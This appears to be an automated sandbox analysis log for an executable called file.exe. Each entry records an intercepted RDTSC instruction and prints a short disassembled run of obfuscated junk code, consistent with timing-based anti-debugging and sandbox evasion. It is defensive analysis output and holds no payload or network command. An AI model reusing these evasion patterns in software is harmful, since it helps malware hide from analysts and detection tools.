Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1248A5C second address: 1248A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1248A60 second address: 1248A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1254728 second address: 125472E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1254884 second address: 12548A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB80D16EFDBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12548A6 second address: 12548AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12548AA second address: 12548BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1265E41 second address: 1265E45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1265E45 second address: 1265E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1265E4D second address: 1265E7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3886h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007FB80CDA3876h 0x00000010 js 00007FB80CDA3876h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1265E7C second address: 1265E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1268C75 second address: 1268CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB80CDA3885h 0x0000000b jmp 00007FB80CDA3885h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127158E second address: 1271596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1271596 second address: 12715B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB80CDA3889h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12716FC second address: 1271702 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12719C0 second address: 12719C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1271CDE second address: 1271D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB80D16EFE9h 0x0000000f je 00007FB80D16EFD6h 0x00000015 jmp 00007FB80D16EFDEh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127545B second address: 1275476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB80CDA3884h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12755B9 second address: 12755BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12755BD second address: 12755C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12972C6 second address: 12972CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12972CC second address: 12972D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12972D0 second address: 12972D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12972D5 second address: 12972E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB80CDA3876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129905B second address: 129905F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12991EE second address: 1299208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3884h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1299208 second address: 1299222 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB80D16EFD8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jne 00007FB80D16EFD6h 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1299222 second address: 129922C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B3318 second address: 12B3323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB80D16EFD6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B3323 second address: 12B335D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3886h 0x00000007 push ecx 0x00000008 jmp 00007FB80CDA3883h 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007FB80CDA389Ch 0x00000016 push eax 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B21D4 second address: 12B21D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B21D9 second address: 12B21E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B21E2 second address: 12B21E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B21E6 second address: 12B21EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B2363 second address: 12B236E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FB80D16EFD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B263C second address: 12B2647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FB80CDA3876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B27D0 second address: 12B27E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B27E6 second address: 12B27F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB80CDA3876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B4A86 second address: 12B4A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FB80D16EFD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B622B second address: 12B622F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B622F second address: 12B6233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B6233 second address: 12B623F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B623F second address: 12B6243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B6243 second address: 12B624B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B624B second address: 12B6253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B6253 second address: 12B626C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3885h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B8F73 second address: 12B8F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B8FF5 second address: 12B9043 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB80CDA3878h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edx, dword ptr [ebp+122D39BAh] 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FB80CDA3878h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov edx, 2C595E31h 0x00000036 call 00007FB80CDA3879h 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jnl 00007FB80CDA3876h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B9043 second address: 12B9047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B9047 second address: 12B9064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007FB80CDA387Bh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B9064 second address: 12B9068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B9068 second address: 12B906E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B906E second address: 12B908E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FB80D16EFD6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push esi 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d push esi 0x0000001e pop esi 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12B908E second address: 12B9094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60E9F second address: 4F60F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB80D16EFE7h 0x00000009 sbb ecx, 117CAEAEh 0x0000000f jmp 00007FB80D16EFE9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB80D16EFE0h 0x0000001b sbb cl, 00000028h 0x0000001e jmp 00007FB80D16EFDBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 jmp 00007FB80D16EFE4h 0x0000002e movzx ecx, bx 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FB80D16EFDCh 0x00000038 xchg eax, ebp 0x00000039 pushad 0x0000003a mov bx, cx 0x0000003d mov ax, EFC9h 0x00000041 popad 0x00000042 mov ebp, esp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FB80D16EFDEh 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60F42 second address: 4F60F48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60F48 second address: 4F60F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50D4B second address: 4F50D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50D51 second address: 4F50D8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB80D16EFE0h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FB80D16EFE0h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50D8B second address: 4F50DA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90E39 second address: 4F90E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90E3D second address: 4F90E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90E43 second address: 4F90E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFDDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90E54 second address: 4F90E72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90E72 second address: 4F90E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90E76 second address: 4F90E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90E7C second address: 4F90E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90E82 second address: 4F90E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F300D9 second address: 4F300DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F300DE second address: 4F300FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB80CDA3883h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F300FD second address: 4F30167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push esi 0x0000000e jmp 00007FB80D16EFE3h 0x00000013 pop esi 0x00000014 mov ax, dx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FB80D16EFE1h 0x00000021 jmp 00007FB80D16EFDBh 0x00000026 popfd 0x00000027 mov ch, 3Dh 0x00000029 popad 0x0000002a push dword ptr [ebp+04h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov eax, 33B06343h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30167 second address: 4F3016D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F301E3 second address: 4F301E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50A55 second address: 4F50AB2 instructions: 0x00000000 rdtsc 0x00000002 mov si, A33Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 41233639h 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, cx 0x00000013 call 00007FB80CDA387Eh 0x00000018 pushfd 0x00000019 jmp 00007FB80CDA3882h 0x0000001e sbb ah, 00000078h 0x00000021 jmp 00007FB80CDA387Bh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FB80CDA3885h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50AB2 second address: 4F50AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50AC2 second address: 4F50AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50AC6 second address: 4F50AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx ecx, di 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F505DD second address: 4F505E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F505E3 second address: 4F505E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F505E7 second address: 4F50644 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f call 00007FB80CDA3884h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 call 00007FB80CDA3881h 0x0000001c mov ax, 5467h 0x00000020 pop eax 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FB80CDA3886h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50644 second address: 4F50649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50649 second address: 4F5066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB80CDA3886h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5066B second address: 4F50670 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50503 second address: 4F5050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5050A second address: 4F50510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50510 second address: 4F50514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50514 second address: 4F50518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50518 second address: 4F5053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB80CDA3889h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5053C second address: 4F50542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50236 second address: 4F50247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA387Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50247 second address: 4F5024B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5024B second address: 4F50270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007FB80CDA3888h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60120 second address: 4F60185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB80D16EFDFh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FB80D16EFE9h 0x0000000f xor esi, 3C3AF076h 0x00000015 jmp 00007FB80D16EFE1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB80D16EFE8h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60185 second address: 4F6018B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
